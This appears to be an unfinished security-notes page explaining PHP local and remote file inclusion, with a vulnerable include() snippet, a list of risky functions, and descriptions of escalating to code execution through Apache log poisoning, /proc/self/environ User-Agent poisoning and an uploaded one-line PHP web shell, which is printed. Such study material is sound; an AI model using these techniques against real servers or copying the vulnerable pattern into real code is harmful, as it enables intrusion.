Secondary Categories: 02-Web Application


Description:

There are two different types of File Inclusion attack methods one is local and the other is remote. In regards to LFI the attacker is able to retrive a file that is locally stored on the victims machine which is usually a web server hosting a website. The other type of file inclusion attack method is RFI and this attack method is triggered when an the web server is retriving external files from the victim machine.

  • Remote File Inclusion (RFI):

    • A piece of vulnerable code would look something similar to what is seen below.
    <?php
    $file =$_GET['page'];	//The page we wish to display
    include($file .".php");	// <-- Vulnerable !!
    ?>

    As you can see the code doesn’t perform any sort of checks on the content of the β€˜page’ parameter which will allow the attacker to put their file or PHP reverse shell into the webpage. The attacker would exploit this RFI by passing a URL that is a link to the PHP reverse shell as the parameter on β€˜page’ in this example.

  • LFI β†’ RCE

These sorts of vulnerabilities occur in PHP functions where developers don’t check the user supplied data

RFI/LFI PHP functions:

  • include()
  • include_once()
  • require()
  • require_once()
  • fopen()

There are several way to go from a LFI/RFI to Remote Code Execution (RCE). One of the ways to get RCE is by Poisoning the Apache Logs. In the log it keeps track of the GET and POST requests that are made to the server, but if the attacker were to change URL header that they are requesting our logs will reflect that in the log file. We can then leverage the log file with our poisoned code by using a LFI this we display the log file that has the malicious code as seen below.

Another method to to get remote code execution from an LFI is through process environment. When a user visits a PHP page on the web server a process is created in the *nix system. Each process has its own entry that can be found in the /proc/self/ directory that creates a static path and a symbolic link from the latest process used that contains useful information. If we can inject some sort of malicious code in the /proc/self/environ, we can run arbitrary command from target through the LFI we have found. If you notice in a /proc/self/environ instance it contains info about the User-Agent. We can leverage this and in order to poison an instance the attacker can use a tool like BurpSuite to alter the User-Agent value to our malicious code to something similar to below. Then using the LFI the attacker can navigate to that file and use the CMD parameter to get code execution.

Another way to go from LFI to RCE is by assuming that we have access to uploading a file to the system. If the attacker was able to upload a malicious file such as a simple php line like seen below then you could point the LFI to that file and use the cmd parameter to execute a command on the system.

<?php exec($_GET[cmd]);>

Resources:

TitleURL
placeholder

Also Check Out:

  • Placeholder